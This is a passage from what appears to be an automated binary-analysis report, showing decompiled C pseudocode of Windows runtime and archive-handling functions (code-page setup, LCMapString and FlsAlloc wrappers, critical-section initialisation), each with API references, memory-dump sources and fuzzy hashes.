          									_push(_t130); // executed
          									E001F910B(_t121, _t144, _t148, __eflags); // executed
          								}
          								asm("sbb edx, edx");
          								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
          								__eflags = E001FA6F6(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
          								if(__eflags != 0) {
          									_t121 = 1;
          								} else {
          									E001F6BF5(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
          									E001F6E03(0x2300e0, 3);
          									__eflags = _t148;
          									if(_t148 != 0) {
          										E001FFBBB(_t148);
          									}
          								}
          								L25:
          								E002016CB(_t153 - 0xe6ec, _t143, _t148, _t151);
          								_t76 = _t121;
          								goto L28;
          							}
          							_t143 =  *(_t151 + 0x21bc);
          							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
          							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
          								goto L25;
          							}
          							asm("sbb ecx, ecx");
          							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
          							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
          							E001FC634(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
          							goto L18;
          						}
          						__eflags =  *(_t151 + 0x5634);
          						if(__eflags < 0) {
          							L12:
          							__eflags = _t148;
          							if(_t148 != 0) {
          								E001F1EDE(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
          								E001FC699(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
          							} else {
          								 *((char*)(_t151 + 0x2111)) = 1;
          							}
          							goto L15;
          						}
          						if(__eflags > 0) {
          							L11:
          							E001F134C(__eflags, 0x1e, _t151 + 0x1e);
          							goto L25;
          						}
          						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
          						if(__eflags <= 0) {
          							goto L12;
          						}
          						goto L11;
          					}
          					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
          					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
          						goto L7;
          					} else {
          						_t76 = 1;
          						goto L28;
          					}
          				} else {
          					E001F134C(_t156, 0x1d, _t151 + 0x1e);
          					E001F6E03(0x2300e0, 3);
          					L27:
          					_t76 = 0;
          					L28:
          					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
          					return _t76;
          				}
          			}


















          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID: CMT
          • API String ID: 3519838083-2756464174
          • Opcode ID: 347a4ac2a577b978bdad4ed3bd492046a5910375a4875929898c17fe4bc37092
          • Instruction ID: 32a3617eded7e202fdd7f63c004baa11e16d6a62e1bccf839d0331420b41afe7
          • Opcode Fuzzy Hash: 347a4ac2a577b978bdad4ed3bd492046a5910375a4875929898c17fe4bc37092
          • Instruction Fuzzy Hash: 6071BE71504B48AEDB25DB30CC51AFBB7E8AF24301F44496EE6AB87142DB326A48DF10
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0021A51E(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
          				signed int _v8;
          				char _v264;
          				char _v520;
          				char _v776;
          				char _v1800;
          				char _v1814;
          				struct _cpinfo _v1820;
          				intOrPtr _v1824;
          				signed char _v1828;
          				signed int _t63;
          				void* _t67;
          				signed char _t68;
          				intOrPtr _t69;
          				void* _t72;
          				char _t73;
          				char _t74;
          				signed char _t75;
          				signed int _t76;
          				signed char _t88;
          				signed int _t91;
          				signed int _t92;
          				signed int _t93;
          				void* _t94;
          				char* _t95;
          				intOrPtr _t99;
          				signed int _t100;
          
          				_t93 = __edx;
          				_t63 =  *0x22d668; // 0x4319796a
          				_v8 = _t63 ^ _t100;
          				_t99 = _a4;
          				_t4 = _t99 + 4; // 0x5efc4d8b
          				if(GetCPInfo( *_t4,  &_v1820) == 0) {
          					_t47 = _t99 + 0x119; // 0x21ab69
          					_t94 = _t47;
          					_t88 = 0;
          					_t67 = 0xffffff9f;
          					_t68 = _t67 - _t94;
          					__eflags = _t68;
          					_v1828 = _t68;
          					do {
          						_t95 = _t94 + _t88;
          						_t69 = _t68 + _t95;
          						_v1824 = _t69;
          						__eflags = _t69 + 0x20 - 0x19;
          						if(_t69 + 0x20 > 0x19) {
          							__eflags = _v1824 - 0x19;
          							if(_v1824 > 0x19) {
          								 *_t95 = 0;
          							} else {
          								_t72 = _t99 + _t88;
          								_t57 = _t72 + 0x19;
          								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
          								__eflags =  *_t57;
          								_t59 = _t88 - 0x20; // -32
          								_t73 = _t59;
          								goto L24;
          							}
          						} else {
          							 *(_t99 + _t88 + 0x19) =  *(_t99 + _t88 + 0x19) | 0x00000010;
          							_t54 = _t88 + 0x20; // 0x20
          							_t73 = _t54;
          							L24:
          							 *_t95 = _t73;
          						}
          						_t68 = _v1828;
          						_t61 = _t99 + 0x119; // 0x21ab69
          						_t94 = _t61;
          						_t88 = _t88 + 1;
          						__eflags = _t88 - 0x100;
          					} while (_t88 < 0x100);
          				} else {
          					_t74 = 0;
          					do {
          						 *((char*)(_t100 + _t74 - 0x104)) = _t74;
          						_t74 = _t74 + 1;
          					} while (_t74 < 0x100);
          					_t75 = _v1814;
          					_t91 =  &_v1814;
          					_v264 = 0x20;
          					while(1) {
          						_t106 = _t75;
          						if(_t75 == 0) {
          							break;
          						}
          						_t93 =  *(_t91 + 1) & 0x000000ff;
          						_t76 = _t75 & 0x000000ff;
          						while(1) {
          							__eflags = _t76 - _t93;
          							if(_t76 > _t93) {
          								break;
          							}
          							__eflags = _t76 - 0x100;
          							if(_t76 < 0x100) {
          								 *((char*)(_t100 + _t76 - 0x104)) = 0x20;
          								_t76 = _t76 + 1;
          								__eflags = _t76;
          								continue;
          							}
          							break;
          						}
          						_t91 = _t91 + 2;
          						__eflags = _t91;
          						_t75 =  *_t91;
          					}
          					_t13 = _t99 + 4; // 0x5efc4d8b
          					E0021B5EA(0, _t93, 0x100, _t99, _t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
          					_t16 = _t99 + 4; // 0x5efc4d8b
          					_t19 = _t99 + 0x21c; // 0x2ebf88b
          					E002197C2(0x100, _t99, _t106, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
          					_t21 = _t99 + 4; // 0x5efc4d8b
          					_t23 = _t99 + 0x21c; // 0x2ebf88b
          					E002197C2(0x100, _t99, _t106, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
          					_t92 = 0;
          					do {
          						_t68 =  *(_t100 + _t92 * 2 - 0x704) & 0x0000ffff;
          						if((_t68 & 0x00000001) == 0) {
          							__eflags = _t68 & 0x00000002;
          							if((_t68 & 0x00000002) == 0) {
          								 *(_t99 + _t92 + 0x119) = 0;
          							} else {
          								_t37 = _t99 + _t92 + 0x19;
          								 *_t37 =  *(_t99 + _t92 + 0x19) | 0x00000020;
          								__eflags =  *_t37;
          								_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x304));
          								goto L15;
          							}
          						} else {
          							 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) | 0x00000010;
          							_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x204));
          							L15:
          							 *(_t99 + _t92 + 0x119) = _t68;
          						}
          						_t92 = _t92 + 1;
          					} while (_t92 < 0x100);
          				}
          				return E0020E203(_t68, _v8 ^ _t100);
          			}

          APIs
          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0021A543
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Info
          • String ID:
          • API String ID: 1807457897-3916222277
          • Opcode ID: 5832d25cc2d113db12c21f1cb628562f0b3e33bbfdb3ca7eb1a3f37eb1618a34
          • Instruction ID: 3aa7b79ee2e6fbd55c4956dbfdbe375c862fe0709d2fcea285cd5bd72468ce30
          • Opcode Fuzzy Hash: 5832d25cc2d113db12c21f1cb628562f0b3e33bbfdb3ca7eb1a3f37eb1618a34
          • Instruction Fuzzy Hash: A4411C70915388AEDF228E648C84BFABBFDEB65304F1804ECD59A86142D27599E5CF21
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 89%
          			E001F1D61(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
          				void* _t34;
          				intOrPtr _t41;
          				intOrPtr _t51;
          				void* _t62;
          				unsigned int _t64;
          				signed int _t66;
          				intOrPtr* _t68;
          				void* _t70;
          
          				_t62 = __edx;
          				_t51 = __ecx;
          				E0020D870(E00221173, _t70);
          				_t49 = 0;
          				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
          				 *((intOrPtr*)(_t70 - 0x24)) = 0;
          				 *(_t70 - 0x20) = 0;
          				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
          				 *((intOrPtr*)(_t70 - 0x18)) = 0;
          				 *((char*)(_t70 - 0x14)) = 0;
          				 *((intOrPtr*)(_t70 - 4)) = 0;
          				_t34 = E001F399D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
          				if(_t34 != 0) {
          					_t64 =  *(_t70 - 0x20);
          					E001F16C0(_t70 - 0x24, _t62, 1);
          					_t68 =  *((intOrPtr*)(_t70 + 8));
          					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
          					_t16 = _t64 + 1; // 0x1
          					E001F1837(_t68, _t16);
          					_t41 =  *((intOrPtr*)(_t70 - 0x10));
          					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
          						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
          							E00200FDE( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
          						} else {
          							_t66 = _t64 >> 1;
          							E00201059( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
          							 *((short*)( *_t68 + _t66 * 2)) = 0;
          						}
          					} else {
          						_push( *((intOrPtr*)(_t68 + 4)));
          						_push( *_t68);
          						_push( *((intOrPtr*)(_t70 - 0x24)));
          						E00201094();
          					}
          					E001F1837(_t68, E00212B33( *_t68));
          					_t49 = 1;
          				}
          				E001F159C(_t70 - 0x24);
          				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
          				return _t49;
          			}

          APIs
          • __EH_prolog.LIBCMT ref: 001F1D66
            • Part of subcall function 001F399D: __EH_prolog.LIBCMT ref: 001F39A2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID: CMT
          • API String ID: 3519838083-2756464174
          • Opcode ID: d170b0d379be9cb4c89d23f8371494c9d959eb4ea855945561e1b0bc6b2015c3
          • Instruction ID: edd1475164d2b904421c96c2b4224dee77161db16dd35d1eed09ff3feb258bcc
          • Opcode Fuzzy Hash: d170b0d379be9cb4c89d23f8371494c9d959eb4ea855945561e1b0bc6b2015c3
          • Instruction Fuzzy Hash: E4214B71904209EFCB15EF98C9459EEFBF6FF59300F1000A9E955A7252C7325E61CB60
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 37%
          			E00219C64(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
          				signed int _v8;
          				signed int _t18;
          				intOrPtr* _t20;
          				int _t22;
          				intOrPtr* _t30;
          				signed int _t32;
          
          				_t25 = __ecx;
          				_push(__ecx);
          				_t18 =  *0x22d668; // 0x4319796a
          				_v8 = _t18 ^ _t32;
          				_push(__esi);
          				_t20 = E00219990(0x16, "LCMapStringEx", 0x226084, "LCMapStringEx"); // executed
          				_t30 = _t20;
          				if(_t30 == 0) {
          					_t22 = LCMapStringW(E00219CEC(_t25, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
          				} else {
          					 *0x222260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
          					_t22 =  *_t30();
          				}
          				return E0020E203(_t22, _v8 ^ _t32);
          			}

          APIs
          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00219CD5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: String
          • String ID: LCMapStringEx
          • API String ID: 2568140703-3893581201
          • Opcode ID: b8eed35cdeaf8d96b0fdff4798f1b8a50ca8c91063d843b534089033aa7cb0c8
          • Instruction ID: 5679fbf68432a4b443357dc39e62acea254aa0ef1b24aa806e866a0a312baeb4
          • Opcode Fuzzy Hash: b8eed35cdeaf8d96b0fdff4798f1b8a50ca8c91063d843b534089033aa7cb0c8
          • Instruction Fuzzy Hash: 8901D332551219FBCF22AF90ED19DEE3FA6FB08750F014515FE1526161C6738AB1EB90
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 37%
          			E00219C02(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
          				signed int _v8;
          				signed int _t8;
          				intOrPtr* _t10;
          				int _t11;
          				intOrPtr* _t19;
          				signed int _t21;
          
          				_push(__ecx);
          				_t8 =  *0x22d668; // 0x4319796a
          				_v8 = _t8 ^ _t21;
          				_t10 = E00219990(0x14, "InitializeCriticalSectionEx", 0x22607c, 0x226084); // executed
          				_t19 = _t10;
          				if(_t19 == 0) {
          					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
          				} else {
          					 *0x222260(_a4, _a8, _a12);
          					_t11 =  *_t19();
          				}
          				return E0020E203(_t11, _v8 ^ _t21);
          			}

          APIs
          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00219291), ref: 00219C4D
          Strings
          • InitializeCriticalSectionEx, xrefs: 00219C1D
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CountCriticalInitializeSectionSpin
          • String ID: InitializeCriticalSectionEx
          • API String ID: 2593887523-3084827643
          • Opcode ID: 020ddeca5bf696edd06a4916e9f77fad17aa87910208539c283256938eeabd1a
          • Instruction ID: a1d371b4d32d89b38ed12486a1868932d8e19c8bb17ea89c11deba9d134cdc2b
          • Opcode Fuzzy Hash: 020ddeca5bf696edd06a4916e9f77fad17aa87910208539c283256938eeabd1a
          • Instruction Fuzzy Hash: 87F0B431A5121CFBCB21AF90EC09CEE7FA5EF09720B014155FD0816161CA724EB1EBC0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 37%
          			E00219AA7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
          				signed int _v8;
          				signed int _t4;
          				intOrPtr* _t6;
          				long _t7;
          				intOrPtr* _t15;
          				signed int _t17;
          
          				_push(__ecx);
          				_t4 =  *0x22d668; // 0x4319796a
          				_v8 = _t4 ^ _t17;
          				_t6 = E00219990(3, "FlsAlloc", 0x226040, 0x226048); // executed
          				_t15 = _t6;
          				if(_t15 == 0) {
          					_t7 = TlsAlloc();
          				} else {
          					 *0x222260(_a4);
          					_t7 =  *_t15();
          				}
          				return E0020E203(_t7, _v8 ^ _t17);
          			}

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Alloc
          • String ID: FlsAlloc
          • API String ID: 2773662609-671089009
          • Opcode ID: 9196c39fb6c86d349320b4f92688445101ab8a883508254bc2daea7794d7beea
          • Instruction ID: 817a9fb8ceb97c20eff3c28d901f0b66325093987c19ecaa6693ce7e6980f022
          • Opcode Fuzzy Hash: 9196c39fb6c86d349320b4f92688445101ab8a883508254bc2daea7794d7beea
          • Instruction Fuzzy Hash: 41E05531A60228FB8730AFE1BC0ADAEBBA8EF15710B000058FC0913281CE714EA19AC4
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 68%
          			E0021281A(void* __eflags, intOrPtr _a4) {
          				intOrPtr* _t2;
          				intOrPtr* _t6;
          
          				_t2 = E002126F9(4, "FlsAlloc", 0x224394, "FlsAlloc"); // executed
          				_t6 = _t2;
          				if(_t6 == 0) {
          					return TlsAlloc();
          				}
          				L0020E2DD();
          				return  *_t6(_a4);
          			}

          APIs
          • try_get_function.LIBVCRUNTIME ref: 0021282F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: try_get_function
          • String ID: FlsAlloc
          • API String ID: 2742660187-671089009
          • Opcode ID: d01f090cfa76759018af39047225f6e247bbd1c02104c909ca278963f78c32a7
          • Instruction ID: 32f7ac7979fd9d13e26b9a0472fbe61b225c814467ce41c03a59ee30079d77b0
          • Opcode Fuzzy Hash: d01f090cfa76759018af39047225f6e247bbd1c02104c909ca278963f78c32a7
          • Instruction Fuzzy Hash: ECD05B31795774F7C62076D57C02ADA7E98C702BB1F0601A2FF0C65183D555547056D1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 97%
          			E0021A873(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
          				signed int _v8;
          				char _v22;
          				struct _cpinfo _v28;
          				signed int _v32;
          				signed int _v36;
          				signed int _t48;
          				int _t51;
          				signed int _t54;
          				signed int _t55;
          				short _t58;
          				signed int _t60;
          				signed char _t62;
          				signed int _t63;
          				signed char* _t71;
          				signed char* _t72;
          				int _t76;
          				signed int _t79;
          				signed char* _t80;
          				short* _t81;
          				int _t85;
          				signed char _t86;
          				signed int _t87;
          				signed int _t89;
          				signed int _t90;
          				int _t92;
          				int _t93;
          				intOrPtr _t96;
          				signed int _t97;
          
          				_t48 =  *0x22d668; // 0x4319796a
          				_v8 = _t48 ^ _t97;
          				_t96 = _a8;
          				_t76 = E0021A446(__eflags, _a4);
          				if(_t76 != 0) {
          					_t92 = 0;
          					__eflags = 0;
          					_t79 = 0;
          					_t51 = 0;
          					_v32 = 0;
          					while(1) {
          						__eflags =  *((intOrPtr*)(_t51 + 0x22d828)) - _t76;
          						if( *((intOrPtr*)(_t51 + 0x22d828)) == _t76) {
          							break;
          						}
          						_t79 = _t79 + 1;
          						_t51 = _t51 + 0x30;
          						_v32 = _t79;
          						__eflags = _t51 - 0xf0;
          						if(_t51 < 0xf0) {
          							continue;
          						} else {
          							__eflags = _t76 - 0xfde8;
          							if(_t76 == 0xfde8) {
          								L23:
          								_t60 = _t51 | 0xffffffff;
          							} else {
          								__eflags = _t76 - 0xfde9;
          								if(_t76 == 0xfde9) {
          									goto L23;
          								} else {
          									_t51 = IsValidCodePage(_t76 & 0x0000ffff);
          									__eflags = _t51;
          									if(_t51 == 0) {
          										goto L23;
          									} else {
          										_t51 = GetCPInfo(_t76,  &_v28);
          										__eflags = _t51;
          										if(_t51 == 0) {
          											__eflags =  *0x250854 - _t92; // 0x0
          											if(__eflags == 0) {
          												goto L23;
          											} else {
          												E0021A4B9(_t96);
          												goto L37;
          											}
          										} else {
          											E0020E920(_t92, _t96 + 0x18, _t92, 0x101);
          											 *(_t96 + 4) = _t76;
          											 *(_t96 + 0x21c) = _t92;
          											_t76 = 1;
          											__eflags = _v28 - 1;
          											if(_v28 <= 1) {
          												 *(_t96 + 8) = _t92;
          											} else {
          												__eflags = _v22;
          												_t71 =  &_v22;
          												if(_v22 != 0) {
          													while(1) {
          														_t86 = _t71[1];
          														__eflags = _t86;
          														if(_t86 == 0) {
          															goto L16;
          														}
          														_t89 = _t86 & 0x000000ff;
          														_t87 =  *_t71 & 0x000000ff;
          														while(1) {
          															__eflags = _t87 - _t89;
          															if(_t87 > _t89) {
          																break;
          															}
          															 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000004;
          															_t87 = _t87 + 1;
          															__eflags = _t87;
          														}
          														_t71 =  &(_t71[2]);
          														__eflags =  *_t71;
          														if( *_t71 != 0) {
          															continue;
          														}
          														goto L16;
          													}
          												}
          												L16:
          												_t72 = _t96 + 0x1a;
          												_t85 = 0xfe;
          												do {
          													 *_t72 =  *_t72 | 0x00000008;
          													_t72 =  &(_t72[1]);
          													_t85 = _t85 - 1;
          													__eflags = _t85;
          												} while (_t85 != 0);
          												 *(_t96 + 0x21c) = E0021A408( *(_t96 + 4));
          												 *(_t96 + 8) = _t76;
          											}
          											_t93 = _t96 + 0xc;
          											asm("stosd");
          											asm("stosd");
          											asm("stosd");
          											L36:
          											E0021A51E(_t76, _t89, _t93, _t96, _t96); // executed
          											L37:
          											_t60 = 0;
          											__eflags = 0;
          										}
          									}
          								}
          							}
          						}
          						goto L39;
          					}
          					E0020E920(_t92, _t96 + 0x18, _t92, 0x101);
          					_t54 = _v32 * 0x30;
          					__eflags = _t54;
          					_v36 = _t54;
          					_t55 = _t54 + 0x22d838;
          					_v32 = _t55;
          					do {
          						__eflags =  *_t55;
          						_t80 = _t55;
          						if( *_t55 != 0) {
          							while(1) {
          								_t62 = _t80[1];
          								__eflags = _t62;
          								if(_t62 == 0) {
          									break;
          								}
          								_t90 =  *_t80 & 0x000000ff;
          								_t63 = _t62 & 0x000000ff;
          								while(1) {
          									__eflags = _t90 - _t63;
          									if(_t90 > _t63) {
          										break;
          									}
          									__eflags = _t90 - 0x100;
          									if(_t90 < 0x100) {
          										_t31 = _t92 + 0x22d820; // 0x8040201
          										 *(_t96 + _t90 + 0x19) =  *(_t96 + _t90 + 0x19) |  *_t31;
          										_t90 = _t90 + 1;
          										__eflags = _t90;
          										_t63 = _t80[1] & 0x000000ff;
          										continue;
          									}
          									break;
          								}
          								_t80 =  &(_t80[2]);
          								__eflags =  *_t80;
          								if( *_t80 != 0) {
          									continue;
          								}
          								break;
          							}
          							_t55 = _v32;
          						}
          						_t92 = _t92 + 1;
          						_t55 = _t55 + 8;
          						_v32 = _t55;
          						__eflags = _t92 - 4;
          					} while (_t92 < 4);
          					 *(_t96 + 4) = _t76;
          					 *(_t96 + 8) = 1;
          					 *(_t96 + 0x21c) = E0021A408(_t76);
          					_t81 = _t96 + 0xc;
          					_t89 = _v36 + 0x22d82c;
          					_t93 = 6;
          					do {
          						_t58 =  *_t89;
          						_t89 = _t89 + 2;
          						 *_t81 = _t58;
          						_t81 = _t81 + 2;
          						_t93 = _t93 - 1;
          						__eflags = _t93;
          					} while (_t93 != 0);
          					goto L36;
          				} else {
          					E0021A4B9(_t96);
          					_t60 = 0;
          				}
          				L39:
          				return E0020E203(_t60, _v8 ^ _t97);
          			}

          APIs
            • Part of subcall function 0021A446: GetOEMCP.KERNEL32(00000000,?,?,0021A6CF,?), ref: 0021A471
          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0021A714,?,00000000), ref: 0021A8E7
          • GetCPInfo.KERNEL32(00000000,0021A714,?,?,?,0021A714,?,00000000), ref: 0021A8FA
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: CodeInfoPageValid
          • String ID:
          • API String ID: 546120528-0
          • Opcode ID: 87db288934526991c195e381877198561a6ee5b8f33adf20793f2f364d6ade53
          • Instruction ID: 426ac644421bfff5cf3ea91abdd01dc251666ad221a4bd43d4d7097d75a3ea04
          • Opcode Fuzzy Hash: 87db288934526991c195e381877198561a6ee5b8f33adf20793f2f364d6ade53
          • Instruction Fuzzy Hash: 19517670922346AFDB20CF71C8456FBBBF5AF20310F15402ED0868B242D67999D6CB92
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 98%
          			E001F1382(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
          				void* __esi;
          				void* _t56;
          				signed int _t62;
          				signed int _t63;
          				char _t64;
          				intOrPtr _t74;
          				intOrPtr* _t78;
          				void* _t86;
          				void* _t87;
          				intOrPtr* _t89;
          				void* _t91;
          				void* _t96;
          
          				_t96 = __eflags;
          				_t87 = __edi;
          				_t86 = __edx;
          				_t78 = __ecx;
          				E0020D870(_t56, _t91);
          				_push(_t78);
          				_t89 = _t78;
          				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
          				E001F943C(_t78);
          				 *_t89 = 0x2222e8;
          				 *((intOrPtr*)(_t91 - 4)) = 0;
          				E001F5E99(_t89 + 0x1024, _t86, _t96);
          				 *((char*)(_t91 - 4)) = 1;
          				E001FC4CA(_t89 + 0x20e8, _t86, _t96);
          				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
          				E001F151B();
          				_t62 = E001F151B();
          				 *((char*)(_t91 - 4)) = 4;
          				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
          				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
          				 *(_t89 + 0x21b8) = _t63;
          				_t98 = _t63;
          				if(_t63 == 0) {
          					_t64 =  *((intOrPtr*)(_t91 + 8));
          				} else {
